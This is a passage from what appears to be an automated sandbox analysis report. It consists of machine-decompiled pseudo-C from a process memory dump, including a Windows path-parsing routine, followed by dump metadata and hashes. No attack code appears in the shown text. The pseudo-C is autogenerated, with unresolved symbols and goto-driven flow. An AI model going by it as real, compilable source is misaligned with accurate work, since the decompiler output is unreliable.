                                                              														}
                                                              													}
                                                              													__eflags = _t511 -  *(_t528 - 0xe4);
                                                              													if(_t511 <  *(_t528 - 0xe4)) {
                                                              														break;
                                                              													}
                                                              													_t397 =  *(_t528 - 0x88) + 1;
                                                              													 *(_t528 - 0x88) = _t397;
                                                              													_t469 = _t469 + 0x10;
                                                              													__eflags = _t397 -  *(_t528 + 0x1c);
                                                              													_t392 =  *(_t528 - 0xa2);
                                                              													if(_t397 <  *(_t528 + 0x1c)) {
                                                              														continue;
                                                              													}
                                                              													goto L45;
                                                              												}
                                                              												_t475 = 0x216;
                                                              												 *(_t528 - 0x74) = 0x216;
                                                              												goto L45;
                                                              											}
                                                              										} else {
                                                              											asm("lock dec dword [eax+ecx*8+0x4]");
                                                              											goto L16;
                                                              										}
                                                              									}
                                                              									_t491 = E04C64CAB(_t306, _t528 - 0xa4);
                                                              									 *(_t528 - 0x74) = _t491;
                                                              									__eflags = _t491;
                                                              									if(_t491 != 0) {
                                                              										goto L91;
                                                              									} else {
                                                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              										goto L20;
                                                              									}
                                                              								}
                                                              								L16:
                                                              								 *(_t528 - 0x74) = 0x1069;
                                                              								L93:
                                                              								_t298 =  *(_t528 - 0xd0) + 1;
                                                              								 *(_t528 - 0xd0) = _t298;
                                                              								_t474 = _t474 + _t511;
                                                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              								_t494 = 4;
                                                              								__eflags = _t298 - _t494;
                                                              								if(_t298 >= _t494) {
                                                              									goto L100;
                                                              								}
                                                              								_t494 =  *(_t528 - 0xcc);
                                                              								_t435 = _t298;
                                                              								continue;
                                                              							}
                                                              							__eflags = _t494[2] | _t494[3];
                                                              							if((_t494[2] | _t494[3]) == 0) {
                                                              								goto L15;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = _t301;
                                                              						if(_t301 != 0) {
                                                              							goto L92;
                                                              						}
                                                              						goto L10;
                                                              						L92:
                                                              						goto L93;
                                                              					}
                                                              				} else {
                                                              					_push(0x57);
                                                              					L101:
                                                              					return E04BED130(_t427, _t494, _t511);
                                                              				}
                                                              			}










































































                                                              0x04c65ba5
                                                              0x04c65baa
                                                              0x04c65baf
                                                              0x04c65bb4
                                                              0x04c65bb6
                                                              0x04c65bbc
                                                              0x04c65bbe
                                                              0x04c65bc4
                                                              0x04c65bcd
                                                              0x04c65bd3
                                                              0x04c65bd6
                                                              0x04c65bdc
                                                              0x04c65be0
                                                              0x04c65be3
                                                              0x04c65beb
                                                              0x04c65bf2
                                                              0x04c65bf8
                                                              0x04c65bfe
                                                              0x04c65c04
                                                              0x04c65c0e
                                                              0x04c65c18
                                                              0x04c65c1f
                                                              0x04c65c25
                                                              0x04c65c2a
                                                              0x04c65c2c
                                                              0x04c65c32
                                                              0x04c65c3a
                                                              0x04c65c3f
                                                              0x04c65c42
                                                              0x04c65c48
                                                              0x04c65c5b
                                                              0x04c65c5b
                                                              0x04c65c2c
                                                              0x04c65cb7
                                                              0x04c65cb9
                                                              0x04c65cbf
                                                              0x04c65cc2
                                                              0x04c65cca
                                                              0x04c65ccb
                                                              0x04c65ccb
                                                              0x04c65cd1
                                                              0x04c65cd7
                                                              0x04c65cda
                                                              0x04c65ce1
                                                              0x04c65ce4
                                                              0x04c65ce7
                                                              0x04c65ced
                                                              0x04c65cf3
                                                              0x04c65cf9
                                                              0x04c65cff
                                                              0x04c65d08
                                                              0x04c65d0a
                                                              0x04c65d0e
                                                              0x04c65d10
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d16
                                                              0x04c65d1a
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d20
                                                              0x04c65d22
                                                              0x04c65d25
                                                              0x04c65d2f
                                                              0x04c65d2f
                                                              0x04c65d33
                                                              0x04c65d3d
                                                              0x04c65d49
                                                              0x04c65d4b
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d5a
                                                              0x04c65d5d
                                                              0x04c65d60
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d66
                                                              0x04c65d69
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d6f
                                                              0x04c65d6f
                                                              0x04c65d73
                                                              0x04c65d79
                                                              0x04c65d7f
                                                              0x04c65d86
                                                              0x04c65d95
                                                              0x04c65d98
                                                              0x04c65dba
                                                              0x04c65dcb
                                                              0x04c65dce
                                                              0x04c65dd3
                                                              0x04c65dd6
                                                              0x04c65dd8
                                                              0x04c65de6
                                                              0x04c65dec
                                                              0x04c65dee
                                                              0x04c65df1
                                                              0x04c65df3
                                                              0x04c6635a
                                                              0x04c6635a
                                                              0x00000000
                                                              0x04c6635a
                                                              0x04c65dfe
                                                              0x04c65e02
                                                              0x04c65e05
                                                              0x04c65e07
                                                              0x04c65e10
                                                              0x04c65e13
                                                              0x04c65e1b
                                                              0x04c65e1c
                                                              0x04c65e21
                                                              0x04c65e22
                                                              0x04c65e23
                                                              0x04c65e25
                                                              0x04c65e2a
                                                              0x04c65e2c
                                                              0x04c65e2e
                                                              0x04c65e36
                                                              0x04c65e39
                                                              0x04c65e42
                                                              0x04c65e47
                                                              0x04c65e4d
                                                              0x04c65e54
                                                              0x04c65e54
                                                              0x04c65e54
                                                              0x04c65e2e
                                                              0x04c65e5c
                                                              0x04c65e5f
                                                              0x04c65e62
                                                              0x04c65e64
                                                              0x04c65e6b
                                                              0x04c65e70
                                                              0x04c65e7a
                                                              0x04c65e7a
                                                              0x04c65e7a
                                                              0x04c65e6b
                                                              0x04c65e7e
                                                              0x04c65e7f
                                                              0x04c65e7f
                                                              0x04c65e81
                                                              0x04c65e87
                                                              0x04c65e8b
                                                              0x04c65e8c
                                                              0x04c65e8c
                                                              0x04c65e8c
                                                              0x04c65e9a
                                                              0x04c65e9c
                                                              0x04c65ea2
                                                              0x04c65ea6
                                                              0x04c65f50
                                                              0x04c65f50
                                                              0x04c65f57
                                                              0x04c65f66
                                                              0x04c65f66
                                                              0x04c65f66
                                                              0x04c65f68
                                                              0x04c65f6a
                                                              0x04c663d0
                                                              0x00000000
                                                              0x04c65f70
                                                              0x04c65f70
                                                              0x04c65f91
                                                              0x04c65f9c
                                                              0x04c65f9e
                                                              0x04c65fa4
                                                              0x04c65fa6
                                                              0x04c6638c
                                                              0x04c66392
                                                              0x04c663a1
                                                              0x04c663a7
                                                              0x04c663af
                                                              0x04c663af
                                                              0x04c663bd
                                                              0x04c663d8
                                                              0x00000000
                                                              0x04c663d8
                                                              0x04c65fac
                                                              0x04c65fb2
                                                              0x04c65fb4
                                                              0x04c65fbd
                                                              0x04c65fc6
                                                              0x04c65fce
                                                              0x04c65fd4
                                                              0x04c65fdc
                                                              0x04c65fec
                                                              0x04c65fed
                                                              0x04c65fee
                                                              0x04c65fef
                                                              0x04c65ff9
                                                              0x04c65ffa
                                                              0x04c65ffb
                                                              0x04c65ffc
                                                              0x04c66000
                                                              0x04c66004
                                                              0x04c66012
                                                              0x04c66012
                                                              0x04c66018
                                                              0x04c66019
                                                              0x04c6601a
                                                              0x04c6601b
                                                              0x04c6601c
                                                              0x04c66020
                                                              0x04c66059
                                                              0x04c6605c
                                                              0x04c66061
                                                              0x04c66061
                                                              0x04c66022
                                                              0x04c66022
                                                              0x04c66022
                                                              0x04c66025
                                                              0x04c6602a
                                                              0x04c6602b
                                                              0x04c66031
                                                              0x04c66037
                                                              0x04c66038
                                                              0x04c6603e
                                                              0x04c66048
                                                              0x04c66049
                                                              0x04c6604a
                                                              0x04c6604b
                                                              0x04c6604c
                                                              0x04c6604d
                                                              0x04c66053
                                                              0x04c66054
                                                              0x04c66054
                                                              0x04c66062
                                                              0x04c66065
                                                              0x04c66067
                                                              0x04c6606a
                                                              0x04c66070
                                                              0x04c66075
                                                              0x04c66076
                                                              0x04c66081
                                                              0x04c66087
                                                              0x04c66095
                                                              0x04c66099
                                                              0x04c6609e
                                                              0x04c660a4
                                                              0x04c660ae
                                                              0x04c660b0
                                                              0x04c660b3
                                                              0x04c660b6
                                                              0x04c660b8
                                                              0x04c660ba
                                                              0x04c660ba
                                                              0x04c660ba
                                                              0x04c660ba
                                                              0x04c660be
                                                              0x04c660c0
                                                              0x04c660c5
                                                              0x04c660c5
                                                              0x04c660c5
                                                              0x04c660c6
                                                              0x04c660cd
                                                              0x04c66114
                                                              0x04c660cf
                                                              0x04c660cf
                                                              0x04c660d4
                                                              0x04c660d5
                                                              0x04c660da
                                                              0x04c660db
                                                              0x04c660e1
                                                              0x04c660e2
                                                              0x04c660e8
                                                              0x04c660f8
                                                              0x04c660fd
                                                              0x04c660fe
                                                              0x04c66102
                                                              0x04c66104
                                                              0x04c66107
                                                              0x04c66109
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610f
                                                              0x04c6610f
                                                              0x04c66117
                                                              0x04c6611a
                                                              0x04c6611f
                                                              0x04c66125
                                                              0x04c66134
                                                              0x04c66139
                                                              0x04c6613f
                                                              0x04c66146
                                                              0x04c66148
                                                              0x04c6614b
                                                              0x04c6614d
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c66153
                                                              0x04c66159
                                                              0x04c66159
                                                              0x04c6615c
                                                              0x04c66163
                                                              0x04c66169
                                                              0x04c6616c
                                                              0x04c66172
                                                              0x04c66181
                                                              0x04c66186
                                                              0x04c66187
                                                              0x04c6618b
                                                              0x04c66191
                                                              0x04c66195
                                                              0x04c661a3
                                                              0x04c661bb
                                                              0x04c661c0
                                                              0x04c661c3
                                                              0x04c661cc
                                                              0x04c661d0
                                                              0x04c661dc
                                                              0x04c661de
                                                              0x04c661e1
                                                              0x04c661e4
                                                              0x04c661e6
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e6
                                                              0x04c661ec
                                                              0x04c661f3
                                                              0x04c66203
                                                              0x04c66209
                                                              0x04c6620a
                                                              0x04c66216
                                                              0x04c6621d
                                                              0x04c66227
                                                              0x04c66241
                                                              0x04c66246
                                                              0x04c6624c
                                                              0x04c66257
                                                              0x04c66259
                                                              0x04c6625c
                                                              0x04c6625e
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c6625e
                                                              0x04c66264
                                                              0x04c66267
                                                              0x04c66269
                                                              0x04c66315
                                                              0x04c66315
                                                              0x04c6631b
                                                              0x04c6631e
                                                              0x04c66324
                                                              0x04c66327
                                                              0x04c6632f
                                                              0x04c66330
                                                              0x04c66333
                                                              0x04c6633a
                                                              0x04c6633c
                                                              0x04c66335
                                                              0x04c66335
                                                              0x04c66335
                                                              0x04c6633f
                                                              0x04c66342
                                                              0x04c6634c
                                                              0x04c66352
                                                              0x04c66355
                                                              0x04c66355
                                                              0x04c66359
                                                              0x00000000
                                                              0x04c6626f
                                                              0x04c66275
                                                              0x04c66275
                                                              0x04c66278
                                                              0x04c6627e
                                                              0x04c6627e
                                                              0x04c66281
                                                              0x04c66287
                                                              0x04c6628d
                                                              0x04c66298
                                                              0x04c6629c
                                                              0x04c662a2
                                                              0x04c6629e
                                                              0x04c6629e
                                                              0x04c6629e
                                                              0x04c662a7
                                                              0x04c662a7
                                                              0x04c662aa
                                                              0x04c662b0
                                                              0x04c662f0
                                                              0x04c662f0
                                                              0x04c662f2
                                                              0x04c662f8
                                                              0x04c662fd
                                                              0x04c662b2
                                                              0x04c662b2
                                                              0x04c662b2
                                                              0x04c662b5
                                                              0x04c662dd
                                                              0x04c662e2
                                                              0x04c662e5
                                                              0x04c662b7
                                                              0x04c662b8
                                                              0x04c662bb
                                                              0x04c662bd
                                                              0x04c662c0
                                                              0x04c662c4
                                                              0x04c662cd
                                                              0x04c662cd
                                                              0x04c662c0
                                                              0x04c662bb
                                                              0x04c662b5
                                                              0x04c66302
                                                              0x04c66303
                                                              0x04c66305
                                                              0x04c66305
                                                              0x04c66305
                                                              0x04c6630c
                                                              0x04c6630c
                                                              0x00000000
                                                              0x04c6627e
                                                              0x04c66269
                                                              0x04c65eac
                                                              0x04c65ebb
                                                              0x04c65ebe
                                                              0x04c65ecb
                                                              0x04c65ecb
                                                              0x04c65ece
                                                              0x04c65ece
                                                              0x04c65ed4
                                                              0x04c65ed7
                                                              0x04c65ed9
                                                              0x04c65edb
                                                              0x04c65edb
                                                              0x04c65ee1
                                                              0x04c65ee1
                                                              0x04c65ee3
                                                              0x04c65f20
                                                              0x04c65f20
                                                              0x04c65ee5
                                                              0x04c65ee5
                                                              0x04c65ee5
                                                              0x04c65ee8
                                                              0x04c65f11
                                                              0x04c65f18
                                                              0x04c65eea
                                                              0x04c65eea
                                                              0x04c65eed
                                                              0x04c65ef2
                                                              0x04c65ef8
                                                              0x04c65efb
                                                              0x04c65f0a
                                                              0x04c65f0a
                                                              0x04c65eed
                                                              0x04c65ee8
                                                              0x04c65f22
                                                              0x04c65f28
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65f30
                                                              0x04c65f31
                                                              0x04c65f37
                                                              0x04c65f3a
                                                              0x04c65f3d
                                                              0x04c65f44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65f46
                                                              0x04c65f48
                                                              0x04c65f4d
                                                              0x00000000
                                                              0x04c65f4d
                                                              0x04c65dda
                                                              0x04c65ddf
                                                              0x00000000
                                                              0x04c65ddf
                                                              0x04c65dd8
                                                              0x04c65da7
                                                              0x04c65da9
                                                              0x04c65dac
                                                              0x04c65dae
                                                              0x00000000
                                                              0x04c65db4
                                                              0x04c65db4
                                                              0x00000000
                                                              0x04c65db4
                                                              0x04c65dae
                                                              0x04c65d88
                                                              0x04c65d8d
                                                              0x04c66363
                                                              0x04c66369
                                                              0x04c6636a
                                                              0x04c66370
                                                              0x04c66372
                                                              0x04c6637a
                                                              0x04c6637b
                                                              0x04c6637d
                                                              0x00000000
                                                              0x00000000
                                                              0x04c6637f
                                                              0x04c66385
                                                              0x00000000
                                                              0x04c66385
                                                              0x04c65d38
                                                              0x04c65d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d3b
                                                              0x04c65d27
                                                              0x04c65d29
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c66360
                                                              0x00000000
                                                              0x04c66360
                                                              0x04c65c10
                                                              0x04c65c10
                                                              0x04c663da
                                                              0x04c663e5
                                                              0x04c663e5

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e8416c43d281640fd7f362523b8dc36f9397982c4369fa009e9517389fc1b2
                                                              • Instruction ID: 21944d6b2d8614e4f0f2f92b14579a45d6a83003ab58ea006cd66a04c68257a6
                                                              • Opcode Fuzzy Hash: d2e8416c43d281640fd7f362523b8dc36f9397982c4369fa009e9517389fc1b2
                                                              • Instruction Fuzzy Hash: 72423D75A00219DFDB24CF68C880BA9B7B2FF45304F15C1AAD94EEB241E775AA85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E04BB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                              				signed int _v8;
                                                              				void* _v20;
                                                              				signed int _v24;
                                                              				char _v532;
                                                              				char _v540;
                                                              				signed short _v544;
                                                              				signed int _v548;
                                                              				signed short* _v552;
                                                              				signed short _v556;
                                                              				signed short* _v560;
                                                              				signed short* _v564;
                                                              				signed short* _v568;
                                                              				void* _v570;
                                                              				signed short* _v572;
                                                              				signed short _v576;
                                                              				signed int _v580;
                                                              				char _v581;
                                                              				void* _v584;
                                                              				unsigned int _v588;
                                                              				signed short* _v592;
                                                              				void* _v597;
                                                              				void* _v600;
                                                              				void* _v604;
                                                              				void* _v609;
                                                              				void* _v616;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				unsigned int _t161;
                                                              				signed int _t162;
                                                              				unsigned int _t163;
                                                              				void* _t169;
                                                              				signed short _t173;
                                                              				signed short _t177;
                                                              				signed short _t181;
                                                              				unsigned int _t182;
                                                              				signed int _t185;
                                                              				signed int _t213;
                                                              				signed int _t225;
                                                              				short _t233;
                                                              				signed char _t234;
                                                              				signed int _t242;
                                                              				signed int _t243;
                                                              				signed int _t244;
                                                              				signed int _t245;
                                                              				signed int _t250;
                                                              				void* _t251;
                                                              				signed short* _t254;
                                                              				void* _t255;
                                                              				signed int _t256;
                                                              				void* _t257;
                                                              				signed short* _t260;
                                                              				signed short _t265;
                                                              				signed short* _t269;
                                                              				signed short _t271;
                                                              				signed short** _t272;
                                                              				signed short* _t275;
                                                              				signed short _t282;
                                                              				signed short _t283;
                                                              				signed short _t290;
                                                              				signed short _t299;
                                                              				signed short _t307;
                                                              				signed int _t308;
                                                              				signed short _t311;
                                                              				signed short* _t315;
                                                              				signed short _t316;
                                                              				void* _t317;
                                                              				void* _t319;
                                                              				signed short* _t321;
                                                              				void* _t322;
                                                              				void* _t323;
                                                              				unsigned int _t324;
                                                              				signed int _t325;
                                                              				void* _t326;
                                                              				signed int _t327;
                                                              				signed int _t329;
                                                              
                                                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                              				_v8 =  *0x4c8d360 ^ _t329;
                                                              				_t157 = _a8;
                                                              				_t321 = _a4;
                                                              				_t315 = __edx;
                                                              				_v548 = __ecx;
                                                              				_t305 = _a20;
                                                              				_v560 = _a12;
                                                              				_t260 = _a16;
                                                              				_v564 = __edx;
                                                              				_v580 = _a8;
                                                              				_v572 = _t260;
                                                              				_v544 = _a20;
                                                              				if( *__edx <= 8) {
                                                              					L3:
                                                              					if(_t260 != 0) {
                                                              						 *_t260 = 0;
                                                              					}
                                                              					_t254 =  &_v532;
                                                              					_v588 = 0x208;
                                                              					if((_v548 & 0x00000001) != 0) {
                                                              						_v556 =  *_t315;
                                                              						_v552 = _t315[2];
                                                              						_t161 = E04BCF232( &_v556);
                                                              						_t316 = _v556;
                                                              						_v540 = _t161;
                                                              						goto L17;
                                                              					} else {
                                                              						_t306 = 0x208;
                                                              						_t298 = _t315;
                                                              						_t316 = E04BB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                              						if(_t316 == 0) {
                                                              							L68:
                                                              							_t322 = 0xc0000033;
                                                              							goto L39;
                                                              						} else {
                                                              							while(_v581 == 0) {
                                                              								_t233 = _v588;
                                                              								if(_t316 > _t233) {
                                                              									_t234 = _v548;
                                                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                              										_t254 = L04BB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                              										if(_t254 == 0) {
                                                              											_t169 = 0xc0000017;
                                                              										} else {
                                                              											_t298 = _v564;
                                                              											_v588 = _t316;
                                                              											_t306 = _t316;
                                                              											_t316 = E04BB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                              											if(_t316 != 0) {
                                                              												continue;
                                                              											} else {
                                                              												goto L68;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L90;
                                                              									}
                                                              								} else {
                                                              									_v556 = _t316;
                                                              									 *((short*)(_t329 + 0x32)) = _t233;
                                                              									_v552 = _t254;
                                                              									if(_t316 < 2) {
                                                              										L11:
                                                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                              											_t161 = 5;
                                                              										} else {
                                                              											if(_t316 < 6) {
                                                              												L87:
                                                              												_t161 = 3;
                                                              											} else {
                                                              												_t242 = _t254[2] & 0x0000ffff;
                                                              												if(_t242 != 0x5c) {
                                                              													if(_t242 == 0x2f) {
                                                              														goto L16;
                                                              													} else {
                                                              														goto L87;
                                                              													}
                                                              													goto L101;
                                                              												} else {
                                                              													L16:
                                                              													_t161 = 2;
                                                              												}
                                                              											}
                                                              										}
                                                              									} else {
                                                              										_t243 =  *_t254 & 0x0000ffff;
                                                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                              											if(_t316 < 4) {
                                                              												L81:
                                                              												_t161 = 4;
                                                              												goto L17;
                                                              											} else {
                                                              												_t244 = _t254[1] & 0x0000ffff;
                                                              												if(_t244 != 0x5c) {
                                                              													if(_t244 == 0x2f) {
                                                              														goto L60;
                                                              													} else {
                                                              														goto L81;
                                                              													}
                                                              												} else {
                                                              													L60:
                                                              													if(_t316 < 6) {
                                                              														L83:
                                                              														_t161 = 1;
                                                              														goto L17;
                                                              													} else {
                                                              														_t245 = _t254[2] & 0x0000ffff;
                                                              														if(_t245 != 0x2e) {
                                                              															if(_t245 == 0x3f) {
                                                              																goto L62;
                                                              															} else {
                                                              																goto L83;
                                                              															}
                                                              														} else {
                                                              															L62:
                                                              															if(_t316 < 8) {
                                                              																L85:
                                                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                              																goto L17;
                                                              															} else {
                                                              																_t250 = _t254[3] & 0x0000ffff;
                                                              																if(_t250 != 0x5c) {
                                                              																	if(_t250 == 0x2f) {
                                                              																		goto L64;
                                                              																	} else {
                                                              																		goto L85;
                                                              																	}
                                                              																} else {
                                                              																	L64:
                                                              																	_t161 = 6;
                                                              																	goto L17;
                                                              																}
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									}
                                                              									L17:
                                                              									if(_t161 != 2) {
                                                              										_t162 = _t161 - 1;
                                                              										if(_t162 > 5) {
                                                              											goto L18;
                                                              										} else {
                                                              											switch( *((intOrPtr*)(_t162 * 4 +  &M04BB45F8))) {
                                                              												case 0:
                                                              													_v568 = 0x4b71078;
                                                              													__eax = 2;
                                                              													goto L20;
                                                              												case 1:
                                                              													goto L18;
                                                              												case 2:
                                                              													_t163 = 4;
                                                              													goto L19;
                                                              											}
                                                              										}
                                                              										goto L41;
                                                              									} else {
                                                              										L18:
                                                              										_t163 = 0;
                                                              										L19:
                                                              										_v568 = 0x4b711c4;
                                                              									}
                                                              									L20:
                                                              									_v588 = _t163;
                                                              									_v564 = _t163 + _t163;
                                                              									_t306 =  *_v568 & 0x0000ffff;
                                                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                              									_v576 = _t265;
                                                              									if(_t265 > 0xfffe) {
                                                              										L90:
                                                              										_t322 = 0xc0000106;
                                                              									} else {
                                                              										if(_t321 != 0) {
                                                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                              												if(_v580 != 0) {
                                                              													goto L23;
                                                              												} else {
                                                              													_t322 = 0xc0000106;
                                                              													goto L39;
                                                              												}
                                                              											} else {
                                                              												_t177 = _t306;
                                                              												goto L25;
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											if(_v580 == _t321) {
                                                              												_t322 = 0xc000000d;
                                                              											} else {
                                                              												L23:
                                                              												_t173 = L04BB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                              												_t269 = _v592;
                                                              												_t269[2] = _t173;
                                                              												if(_t173 == 0) {
                                                              													_t322 = 0xc0000017;
                                                              												} else {
                                                              													_t316 = _v556;
                                                              													 *_t269 = 0;
                                                              													_t321 = _t269;
                                                              													_t269[1] = _v576;
                                                              													_t177 =  *_v568 & 0x0000ffff;
                                                              													L25:
                                                              													_v580 = _t177;
                                                              													if(_t177 == 0) {
                                                              														L29:
                                                              														_t307 =  *_t321 & 0x0000ffff;
                                                              													} else {
                                                              														_t290 =  *_t321 & 0x0000ffff;
                                                              														_v576 = _t290;
                                                              														_t310 = _t177 & 0x0000ffff;
                                                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                              															_t307 =  *_t321 & 0xffff;
                                                              														} else {
                                                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                              															E04BDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t311 = _v580;
                                                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                              															 *_t321 = _t225;
                                                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              															}
                                                              															goto L29;
                                                              														}
                                                              													}
                                                              													_t271 = _v556 - _v588 + _v588;
                                                              													_v580 = _t307;
                                                              													_v576 = _t271;
                                                              													if(_t271 != 0) {
                                                              														_t308 = _t271 & 0x0000ffff;
                                                              														_v588 = _t308;
                                                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                              															E04BDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                              															 *_t321 = _t213;
                                                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                              															}
                                                              														}
                                                              													}
                                                              													_t272 = _v560;
                                                              													if(_t272 != 0) {
                                                              														 *_t272 = _t321;
                                                              													}
                                                              													_t306 = 0;
                                                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              													_t275 = _v572;
                                                              													if(_t275 != 0) {
                                                              														_t306 =  *_t275;
                                                              														if(_t306 != 0) {
                                                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                              														}
                                                              													}
                                                              													_t181 = _v544;
                                                              													if(_t181 != 0) {
                                                              														 *_t181 = 0;
                                                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                              														if(_v540 == 5) {
                                                              															_t182 = E04B952A5(1);
                                                              															_v588 = _t182;
                                                              															if(_t182 == 0) {
                                                              																E04BAEB70(1, 0x4c879a0);
                                                              																goto L38;
                                                              															} else {
                                                              																_v560 = _t182 + 0xc;
                                                              																_t185 = E04BAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                              																if(_t185 == 0) {
                                                              																	_t324 = _v588;
                                                              																	goto L97;
                                                              																} else {
                                                              																	_t306 = _v544;
                                                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                              																	 *(_t306 + 4) = _t282;
                                                              																	_v576 = _t282;
                                                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                              																	 *_t306 = _t325;
                                                              																	if( *_t282 == 0x5c) {
                                                              																		_t149 = _t325 - 2; // -2
                                                              																		_t283 = _t149;
                                                              																		 *_t306 = _t283;
                                                              																		 *(_t306 + 4) = _v576 + 2;
                                                              																		_t185 = _t283 & 0x0000ffff;
                                                              																	}
                                                              																	_t324 = _v588;
                                                              																	 *(_t306 + 2) = _t185;
                                                              																	if((_v548 & 0x00000002) == 0) {
                                                              																		L97:
                                                              																		asm("lock xadd [esi], eax");
                                                              																		if((_t185 | 0xffffffff) == 0) {
                                                              																			_push( *((intOrPtr*)(_t324 + 4)));
                                                              																			E04BD95D0();
                                                              																			L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                              																		}
                                                              																	} else {
                                                              																		 *(_t306 + 0xc) = _t324;
                                                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                              																	}
                                                              																	goto L38;
                                                              																}
                                                              															}
                                                              															goto L41;
                                                              														}
                                                              													}
                                                              													L38:
                                                              													_t322 = 0;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              									L39:
                                                              									if(_t254 !=  &_v532) {
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                              									}
                                                              									_t169 = _t322;
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              							goto L68;
                                                              						}
                                                              					}
                                                              					L41:
                                                              					_pop(_t317);
                                                              					_pop(_t323);
                                                              					_pop(_t255);
                                                              					return E04BDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                              				} else {
                                                              					_t299 = __edx[2];
                                                              					if( *_t299 == 0x5c) {
                                                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                              						if(_t256 != 0x5c) {
                                                              							if(_t256 != 0x3f) {
                                                              								goto L2;
                                                              							} else {
                                                              								goto L50;
                                                              							}
                                                              						} else {
                                                              							L50:
                                                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                              								goto L2;
                                                              							} else {
                                                              								_t251 = E04BD3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                              								_pop(_t319);
                                                              								_pop(_t326);
                                                              								_pop(_t257);
                                                              								return E04BDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                              							}
                                                              						}
                                                              					} else {
                                                              						L2:
                                                              						_t260 = _v572;
                                                              						goto L3;
                                                              					}
